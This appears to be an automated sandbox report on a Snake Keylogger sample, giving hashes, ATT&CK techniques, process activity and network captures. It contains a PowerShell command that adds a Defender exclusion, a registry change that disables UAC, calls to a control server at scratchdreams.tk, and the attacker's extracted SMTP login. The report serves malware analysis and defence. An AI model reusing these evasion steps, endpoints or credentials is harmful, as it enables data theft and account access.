snakekeylogger | fb05094101868b60a53e0b1ab21495b514dd51f71fce4db73b3019aaf959ac35

Analysis

max time kernel
120s
max time network
143s
platform
windows7_x64
resource
win7-20240221-en
resource tags

arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
submitted
21/05/2024, 17:13 UTC

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

z64PEDIDODECOMPRAURGENTE___s___x___l___x____.exe
Size

761KB
MD5

2856e54f11cdc055102dcaed3585dd56
SHA1

b192fd0f524e7a94a490bc8f57d78f8e702c87cb
SHA256

fb05094101868b60a53e0b1ab21495b514dd51f71fce4db73b3019aaf959ac35
SHA512

eb2bab493418118c9c8d7955711f8f1074fcaafca01d23808960f1289d409b46e14d7632c3ebce47947621ef18e44a3b9b084275c9955f7c848ed0460a2832a8
SSDEEP

12288:SR2wgMVFB7oZFeRmn23s2fP8rsYhvYdm6piaFzYO6dkbNI:SYMZvRmFQP6s2Ydm+iaFzYOHbNI

Score

10^/10

snakekeylogger collection evasion execution keylogger stealer trojan

Malware Config

Extracted

Family

snakekeylogger

Credentials

Protocol: smtp
Host:
mail.gbogboro.com
Port:
587
Username:
davine2024@gbogboro.com
Password:
Egoamaka@123

https://scratchdreams.tk

Signatures

Snake Keylogger
Keylogger and Infostealer first seen in November 2020.
stealer keylogger snakekeylogger

Snake Keylogger payload 5 IoCs

resource	yara_rule
behavioral1/memory/2764-18-0x0000000000400000-0x0000000000426000-memory.dmp	family_snakekeylogger
behavioral1/memory/2764-16-0x0000000000400000-0x0000000000426000-memory.dmp	family_snakekeylogger
behavioral1/memory/2764-21-0x0000000000400000-0x0000000000426000-memory.dmp	family_snakekeylogger
behavioral1/memory/2764-23-0x0000000000400000-0x0000000000426000-memory.dmp	family_snakekeylogger
behavioral1/memory/2764-22-0x0000000000400000-0x0000000000426000-memory.dmp	family_snakekeylogger

UAC bypass 3 TTPs 1 IoCs

evasion trojan

Bypass User Account Control

T1548.002

Disable or Modify Tools

T1562.001

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	z64PEDIDODECOMPRAURGENTE___s___x___l___x____.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
2540	powershell.exe

Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs

collection

Email Collection

T1114

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	AddInProcess32.exe
Key opened	\REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	AddInProcess32.exe
Key opened	\REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	AddInProcess32.exe

Checks whether UAC is enabled 1 TTPs 2 IoCs

evasion trojan

System Information Discovery

T1082

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	z64PEDIDODECOMPRAURGENTE___s___x___l___x____.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	z64PEDIDODECOMPRAURGENTE___s___x___l___x____.exe

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
4	checkip.dyndns.org

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 3008 set thread context of 2764	3008	z64PEDIDODECOMPRAURGENTE___s___x___l___x____.exe	30

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 3 IoCs

pid	Process
2540	powershell.exe
2764	AddInProcess32.exe
2764	AddInProcess32.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	2540	powershell.exe
Token: SeDebugPrivilege	2764	AddInProcess32.exe

Suspicious use of WriteProcessMemory 15 IoCs

description	pid	Process	procid_target
PID 3008 wrote to memory of 2540	3008	z64PEDIDODECOMPRAURGENTE___s___x___l___x____.exe	28
PID 3008 wrote to memory of 2540	3008	z64PEDIDODECOMPRAURGENTE___s___x___l___x____.exe	28
PID 3008 wrote to memory of 2540	3008	z64PEDIDODECOMPRAURGENTE___s___x___l___x____.exe	28
PID 3008 wrote to memory of 2764	3008	z64PEDIDODECOMPRAURGENTE___s___x___l___x____.exe	30
PID 3008 wrote to memory of 2764	3008	z64PEDIDODECOMPRAURGENTE___s___x___l___x____.exe	30
PID 3008 wrote to memory of 2764	3008	z64PEDIDODECOMPRAURGENTE___s___x___l___x____.exe	30
PID 3008 wrote to memory of 2764	3008	z64PEDIDODECOMPRAURGENTE___s___x___l___x____.exe	30
PID 3008 wrote to memory of 2764	3008	z64PEDIDODECOMPRAURGENTE___s___x___l___x____.exe	30
PID 3008 wrote to memory of 2764	3008	z64PEDIDODECOMPRAURGENTE___s___x___l___x____.exe	30
PID 3008 wrote to memory of 2764	3008	z64PEDIDODECOMPRAURGENTE___s___x___l___x____.exe	30
PID 3008 wrote to memory of 2764	3008	z64PEDIDODECOMPRAURGENTE___s___x___l___x____.exe	30
PID 3008 wrote to memory of 2764	3008	z64PEDIDODECOMPRAURGENTE___s___x___l___x____.exe	30
PID 3008 wrote to memory of 2740	3008	z64PEDIDODECOMPRAURGENTE___s___x___l___x____.exe	31
PID 3008 wrote to memory of 2740	3008	z64PEDIDODECOMPRAURGENTE___s___x___l___x____.exe	31
PID 3008 wrote to memory of 2740	3008	z64PEDIDODECOMPRAURGENTE___s___x___l___x____.exe	31

System policy modification 1 TTPs 1 IoCs

evasion

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	z64PEDIDODECOMPRAURGENTE___s___x___l___x____.exe

outlook_office_path 1 IoCs

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	AddInProcess32.exe

outlook_win_path 1 IoCs

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	AddInProcess32.exe

C:\Users\Admin\AppData\Local\Temp\z64PEDIDODECOMPRAURGENTE___s___x___l___x____.exe
"C:\Users\Admin\AppData\Local\Temp\z64PEDIDODECOMPRAURGENTE___s___x___l___x____.exe"
1⤵
- UAC bypass
- Checks whether UAC is enabled
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
- System policy modification
PID:3008
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\z64PEDIDODECOMPRAURGENTE___s___x___l___x____.exe" -Force
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2540
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
  2⤵
  - Accesses Microsoft Outlook profiles
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - outlook_office_path
  - outlook_win_path
  PID:2764
- C:\Windows\system32\WerFault.exe
  C:\Windows\system32\WerFault.exe -u -p 3008 -s 796
  2⤵
  PID:2740

Network

DNS

checkip.dyndns.org

AddInProcess32.exe

Remote address:

8.8.8.8:53

Request

checkip.dyndns.org

IN A

Response

checkip.dyndns.org

IN CNAME

checkip.dyndns.com

checkip.dyndns.com

IN A

132.226.8.169

checkip.dyndns.com

IN A

193.122.130.0

checkip.dyndns.com

IN A

158.101.44.242

checkip.dyndns.com

IN A

132.226.247.73

checkip.dyndns.com

IN A

193.122.6.168
GET

http://checkip.dyndns.org/

AddInProcess32.exe

Remote address:

132.226.8.169:80

Request

GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Date: Tue, 21 May 2024 17:13:22 GMT
Content-Type: text/html
Content-Length: 106
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: 90d68bc8c618b48ba21e381d36de863d
GET

http://checkip.dyndns.org/

AddInProcess32.exe

Remote address:

132.226.8.169:80

Request

GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org

Response

HTTP/1.1 200 OK

Date: Tue, 21 May 2024 17:13:25 GMT
Content-Type: text/html
Content-Length: 106
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: 50fa596ce63136f0db16b56188a54b36
GET

http://checkip.dyndns.org/

AddInProcess32.exe

Remote address:

132.226.8.169:80

Request

GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org

Response

HTTP/1.1 200 OK

Date: Tue, 21 May 2024 17:13:31 GMT
Content-Type: text/html
Content-Length: 106
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: 3bd2fac5f3aa923df0e6995c08eb6e86
GET

http://checkip.dyndns.org/

AddInProcess32.exe

Remote address:

132.226.8.169:80

Request

GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org

Response

HTTP/1.1 200 OK

Date: Tue, 21 May 2024 17:13:34 GMT
Content-Type: text/html
Content-Length: 106
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: cc643f9195670e9f9fb1fa81a78627f2
GET

http://checkip.dyndns.org/

AddInProcess32.exe

Remote address:

132.226.8.169:80

Request

GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org

Response

HTTP/1.1 200 OK

Date: Tue, 21 May 2024 17:13:37 GMT
Content-Type: text/html
Content-Length: 106
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: fb3f3013e4b197efe2699ab910c22aaa
GET

http://checkip.dyndns.org/

AddInProcess32.exe

Remote address:

132.226.8.169:80

Request

GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org

Response

HTTP/1.1 200 OK

Date: Tue, 21 May 2024 17:13:40 GMT
Content-Type: text/html
Content-Length: 106
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: ea639b0c8935b244e0cd1a5d6fb105f1
GET

http://checkip.dyndns.org/

AddInProcess32.exe

Remote address:

132.226.8.169:80

Request

GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org

Response

HTTP/1.1 200 OK

Date: Tue, 21 May 2024 17:13:43 GMT
Content-Type: text/html
Content-Length: 106
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: 3cb1c1f71091f183d4c924140540cce3
GET

http://checkip.dyndns.org/

AddInProcess32.exe

Remote address:

132.226.8.169:80

Request

GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org

Response

HTTP/1.1 200 OK

Date: Tue, 21 May 2024 17:13:46 GMT
Content-Type: text/html
Content-Length: 106
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: 971fde80c3debb5264487706713ee93c
GET

http://checkip.dyndns.org/

AddInProcess32.exe

Remote address:

132.226.8.169:80

Request

GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org

Response

HTTP/1.1 200 OK

Date: Tue, 21 May 2024 17:13:49 GMT
Content-Type: text/html
Content-Length: 106
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: 6cec7467161b9ddda9c5bac556401788
DNS

reallyfreegeoip.org

AddInProcess32.exe

Remote address:

8.8.8.8:53

Request

reallyfreegeoip.org

IN A

Response

reallyfreegeoip.org

IN A

104.21.67.152

reallyfreegeoip.org

IN A

172.67.177.134
GET

https://reallyfreegeoip.org/xml/191.101.209.39

AddInProcess32.exe

Remote address:

104.21.67.152:443

Request

GET /xml/191.101.209.39 HTTP/1.1
Host: reallyfreegeoip.org
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Date: Tue, 21 May 2024 17:13:28 GMT
Content-Type: application/xml
Transfer-Encoding: chunked
Connection: keep-alive
access-control-allow-origin: *
vary: Accept-Encoding
Cache-Control: max-age=86400
CF-Cache-Status: HIT
Age: 10380
Last-Modified: Tue, 21 May 2024 14:20:28 GMT
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Kc%2F9xOauF%2BnzQg4XSafSb6H3OolD4J2ID4OPhkRmiLoS2XvRbchqhf1XgVpCgjadRNbhngXVDx61K8FppzDIRauODRbUAy%2FXq0CL3z2zlxNF3crd9LeD%2Bq3Zy8XpfaqDM%2BWnXLH5"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 88763281fa1594cf-LHR
alt-svc: h3=":443"; ma=86400
GET

https://reallyfreegeoip.org/xml/191.101.209.39

AddInProcess32.exe

Remote address:

104.21.67.152:443

Request

GET /xml/191.101.209.39 HTTP/1.1
Host: reallyfreegeoip.org

Response

HTTP/1.1 200 OK

Date: Tue, 21 May 2024 17:13:31 GMT
Content-Type: application/xml
Transfer-Encoding: chunked
Connection: keep-alive
access-control-allow-origin: *
vary: Accept-Encoding
Cache-Control: max-age=86400
CF-Cache-Status: HIT
Age: 10383
Last-Modified: Tue, 21 May 2024 14:20:28 GMT
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fROJ8vx3NVlP2e0chTETFJUnZP4VIbmu8e3wOerHzG73hSw3G7tfzFzjNhxXCvmQvMGmsjyjtu2J%2BAkxYZgdT8jCdh%2BAl0%2F%2BW4XOvjfjnZ6lWfTdRAnxSWcMAKNC7MZIaGYI0s0a"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8876329478cd94cf-LHR
alt-svc: h3=":443"; ma=86400
GET

https://reallyfreegeoip.org/xml/191.101.209.39

AddInProcess32.exe

Remote address:

104.21.67.152:443

Request

GET /xml/191.101.209.39 HTTP/1.1
Host: reallyfreegeoip.org

Response

HTTP/1.1 200 OK

Date: Tue, 21 May 2024 17:13:34 GMT
Content-Type: application/xml
Transfer-Encoding: chunked
Connection: keep-alive
access-control-allow-origin: *
vary: Accept-Encoding
Cache-Control: max-age=86400
CF-Cache-Status: HIT
Age: 10386
Last-Modified: Tue, 21 May 2024 14:20:28 GMT
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3RodthBTtOW9TSAZ%2F6W2sRR1r3QEjjbJRV%2Fh3aS5xjZa0U2ZlHfWtRbgDRSQa98yvUxFHgx1gKMyvXw2QtKHXhBtVVfHdI7fmc1n5xEDrkVYV3qiXhoQMUOPeO14YZiPkpqe1ASt"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 887632a6fd6094cf-LHR
alt-svc: h3=":443"; ma=86400
GET

https://reallyfreegeoip.org/xml/191.101.209.39

AddInProcess32.exe

Remote address:

104.21.67.152:443

Request

GET /xml/191.101.209.39 HTTP/1.1
Host: reallyfreegeoip.org

Response

HTTP/1.1 200 OK

Date: Tue, 21 May 2024 17:13:37 GMT
Content-Type: application/xml
Transfer-Encoding: chunked
Connection: keep-alive
access-control-allow-origin: *
vary: Accept-Encoding
Cache-Control: max-age=86400
CF-Cache-Status: HIT
Age: 10389
Last-Modified: Tue, 21 May 2024 14:20:28 GMT
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=X0Kh93o9VeFmu4ijZJlzRTUAD0W%2B6%2BXlbaMXZNAv3NKaucfgFFa5KI5qzAtScWZVB8WPSqVh4YF5ivNcKSDbS%2FzHNrj8k1Gq%2FZiLIiZMYa6523hR3oBPb2OstDX6dlyFVtxM8v40"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 887632b9bb8c94cf-LHR
alt-svc: h3=":443"; ma=86400
GET

https://reallyfreegeoip.org/xml/191.101.209.39

AddInProcess32.exe

Remote address:

104.21.67.152:443

Request

GET /xml/191.101.209.39 HTTP/1.1
Host: reallyfreegeoip.org

Response

HTTP/1.1 200 OK

Date: Tue, 21 May 2024 17:13:40 GMT
Content-Type: application/xml
Transfer-Encoding: chunked
Connection: keep-alive
access-control-allow-origin: *
vary: Accept-Encoding
Cache-Control: max-age=86400
CF-Cache-Status: HIT
Age: 10392
Last-Modified: Tue, 21 May 2024 14:20:28 GMT
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BcXOU07xxk9d6TStoqcTjw3FgnyoECqkNVu8gOyIF1qsQYzIz65r9ydTLKlDSYikFkluLVe2aBNAs81KzbWZQsbieJcYHvlNcKVixt9mZyl1bxTuKIQDNiOPAWS5f%2BFKUni2JUYa"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 887632cbffc894cf-LHR
alt-svc: h3=":443"; ma=86400
GET

https://reallyfreegeoip.org/xml/191.101.209.39

AddInProcess32.exe

Remote address:

104.21.67.152:443

Request

GET /xml/191.101.209.39 HTTP/1.1
Host: reallyfreegeoip.org

Response

HTTP/1.1 200 OK

Date: Tue, 21 May 2024 17:13:43 GMT
Content-Type: application/xml
Transfer-Encoding: chunked
Connection: keep-alive
access-control-allow-origin: *
vary: Accept-Encoding
Cache-Control: max-age=86400
CF-Cache-Status: HIT
Age: 10395
Last-Modified: Tue, 21 May 2024 14:20:28 GMT
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sU1V5bATki1NPHMDzzEJMzIj6EUJE9BlhXh%2F8XAahrr1mD4ljhP%2B3NWX9H3yNDobjtkA0PKa%2BlxquLevEwO5oMJpQspn4uow7GFhk%2BOhSiYQ9%2FOZ6v6AtjAXdbsqwOAurIDlnxbJ"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 887632de4d8694cf-LHR
alt-svc: h3=":443"; ma=86400
GET

https://reallyfreegeoip.org/xml/191.101.209.39

AddInProcess32.exe

Remote address:

104.21.67.152:443

Request

GET /xml/191.101.209.39 HTTP/1.1
Host: reallyfreegeoip.org

Response

HTTP/1.1 200 OK

Date: Tue, 21 May 2024 17:13:46 GMT
Content-Type: application/xml
Transfer-Encoding: chunked
Connection: keep-alive
access-control-allow-origin: *
vary: Accept-Encoding
Cache-Control: max-age=86400
CF-Cache-Status: HIT
Age: 10398
Last-Modified: Tue, 21 May 2024 14:20:28 GMT
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=23RjJhsmV1Srk8LE8BoVc1CEdSMrlMFAXZ8rP2PwKMVnp8HgY7xifOgtBYN258u%2Fw4zXB1Gp8olwHRpNzh7IjL83HFidWeY4OvCnXTVpaEQ2yQifHiCI7L7An69m5EcZEbHKnVPw"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 887632f0b88b94cf-LHR
alt-svc: h3=":443"; ma=86400
GET

https://reallyfreegeoip.org/xml/191.101.209.39

AddInProcess32.exe

Remote address:

104.21.67.152:443

Request

GET /xml/191.101.209.39 HTTP/1.1
Host: reallyfreegeoip.org

Response

HTTP/1.1 200 OK

Date: Tue, 21 May 2024 17:13:49 GMT
Content-Type: application/xml
Transfer-Encoding: chunked
Connection: keep-alive
access-control-allow-origin: *
vary: Accept-Encoding
Cache-Control: max-age=86400
CF-Cache-Status: HIT
Age: 10401
Last-Modified: Tue, 21 May 2024 14:20:28 GMT
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vk1315wloo%2ByL8M7AD3l4E4iPTYfhATAh5ZEcN1lJd7oYJyE3SKzlT5DqBpX5C2ZoOB84gdE7C6ILldM%2B6FV3hUhf1qx5hZQEM5fRZXpjiiniZDwINQArLvdfNNjtEXGMHMatu8%2B"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 887633031f5a94cf-LHR
alt-svc: h3=":443"; ma=86400
DNS

scratchdreams.tk

AddInProcess32.exe

Remote address:

8.8.8.8:53

Request

scratchdreams.tk

IN A

Response

scratchdreams.tk

IN A

188.114.97.2

scratchdreams.tk

IN A

188.114.96.2
GET

https://scratchdreams.tk/_send_.php?TS

AddInProcess32.exe

Remote address:

188.114.97.2:443

Request

GET /_send_.php?TS HTTP/1.1
Host: scratchdreams.tk
Connection: Keep-Alive

Response

HTTP/1.1 522

Date: Tue, 21 May 2024 17:14:28 GMT
Content-Type: text/plain; charset=UTF-8
Content-Length: 15
Connection: keep-alive
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hmXpvMeKB6PllSw6MEgL2ZNukf3Pne5ePgo%2BcWvHWKeP5UdMA7UTe%2BPAQeedqysDKnMjrMdQjkEeKkU3V5Mmm6h9S0ExlDzeNw8d9gytPTowb8Q7NFNLnJX2TBENle2j78LO"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
X-Frame-Options: SAMEORIGIN
Referrer-Policy: same-origin
Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Server: cloudflare
CF-RAY: 887633056d46946b-LHR
alt-svc: h3=":443"; ma=86400

132.226.8.169:80

http://checkip.dyndns.org/

http

AddInProcess32.exe

2.1kB
3.4kB
22
13

HTTP Request

GET http://checkip.dyndns.org/

HTTP Response

200

HTTP Request

GET http://checkip.dyndns.org/

HTTP Response

200

HTTP Request

GET http://checkip.dyndns.org/

HTTP Response

200

HTTP Request

GET http://checkip.dyndns.org/

HTTP Response

200

HTTP Request

GET http://checkip.dyndns.org/

HTTP Response

200

HTTP Request

GET http://checkip.dyndns.org/

HTTP Response

200

HTTP Request

GET http://checkip.dyndns.org/

HTTP Response

200

HTTP Request

GET http://checkip.dyndns.org/

HTTP Response

200

HTTP Request

GET http://checkip.dyndns.org/

HTTP Response

200
104.21.67.152:443

https://reallyfreegeoip.org/xml/191.101.209.39

tls, http

AddInProcess32.exe

2.1kB
14.9kB
24
24

HTTP Request

GET https://reallyfreegeoip.org/xml/191.101.209.39

HTTP Response

200

HTTP Request

GET https://reallyfreegeoip.org/xml/191.101.209.39

HTTP Response

200

HTTP Request

GET https://reallyfreegeoip.org/xml/191.101.209.39

HTTP Response

200

HTTP Request

GET https://reallyfreegeoip.org/xml/191.101.209.39

HTTP Response

200

HTTP Request

GET https://reallyfreegeoip.org/xml/191.101.209.39

HTTP Response

200

HTTP Request

GET https://reallyfreegeoip.org/xml/191.101.209.39

HTTP Response

200

HTTP Request

GET https://reallyfreegeoip.org/xml/191.101.209.39

HTTP Response

200

HTTP Request

GET https://reallyfreegeoip.org/xml/191.101.209.39

HTTP Response

200
188.114.97.2:443

https://scratchdreams.tk/_send_.php?TS

tls, http

AddInProcess32.exe

797 B
5.9kB
8
9

HTTP Request

GET https://scratchdreams.tk/_send_.php?TS

HTTP Response

522

8.8.8.8:53

checkip.dyndns.org

dns

AddInProcess32.exe

64 B
176 B
1
1

DNS Request

checkip.dyndns.org

DNS Response

132.226.8.169

193.122.130.0

158.101.44.242

132.226.247.73

193.122.6.168
8.8.8.8:53

reallyfreegeoip.org

dns

AddInProcess32.exe

65 B
97 B
1
1

DNS Request

reallyfreegeoip.org

DNS Response

104.21.67.152

172.67.177.134
8.8.8.8:53

scratchdreams.tk

dns

AddInProcess32.exe

62 B
94 B
1
1

DNS Request

scratchdreams.tk

DNS Response

188.114.97.2

188.114.96.2

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Defense Evasion

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Impair Defenses

T1562

Disable or Modify Tools

T1562.001

Modify Registry

T1112

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Email Collection

T1114

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/2540-9-0x0000000002540000-0x00000000025C0000-memory.dmp

Filesize
512KB

Download
memory/2540-11-0x0000000002510000-0x0000000002518000-memory.dmp

Filesize
32KB

Download
memory/2540-10-0x000000001B290000-0x000000001B572000-memory.dmp

Filesize
2.9MB

Download
memory/2764-21-0x0000000000400000-0x0000000000426000-memory.dmp

Filesize
152KB

Download
memory/2764-20-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

Filesize
4KB

Download
memory/2764-22-0x0000000000400000-0x0000000000426000-memory.dmp

Filesize
152KB

Download
memory/2764-23-0x0000000000400000-0x0000000000426000-memory.dmp

Filesize
152KB

Download
memory/2764-16-0x0000000000400000-0x0000000000426000-memory.dmp

Filesize
152KB

Download
memory/2764-12-0x0000000000400000-0x0000000000426000-memory.dmp

Filesize
152KB

Download
memory/2764-14-0x0000000000400000-0x0000000000426000-memory.dmp

Filesize
152KB

Download
memory/2764-18-0x0000000000400000-0x0000000000426000-memory.dmp

Filesize
152KB

Download
memory/3008-1-0x0000000001020000-0x000000000106C000-memory.dmp

Filesize
304KB

Download
memory/3008-0-0x000007FEF5813000-0x000007FEF5814000-memory.dmp

Filesize
4KB

Download
memory/3008-4-0x00000000005E0000-0x000000000065A000-memory.dmp

Filesize
488KB

Download
memory/3008-2-0x000007FEF5810000-0x000007FEF61FC000-memory.dmp

Filesize
9.9MB

Download
memory/3008-3-0x00000000002A0000-0x00000000002A6000-memory.dmp

Filesize
24KB

Download
memory/3008-24-0x000007FEF5813000-0x000007FEF5814000-memory.dmp

Filesize
4KB

Download
memory/3008-25-0x000007FEF5810000-0x000007FEF61FC000-memory.dmp

Filesize
9.9MB

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

DNS Request

DNS Response

DNS Request

DNS Response

DNS Request

DNS Response

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

We care about your privacy.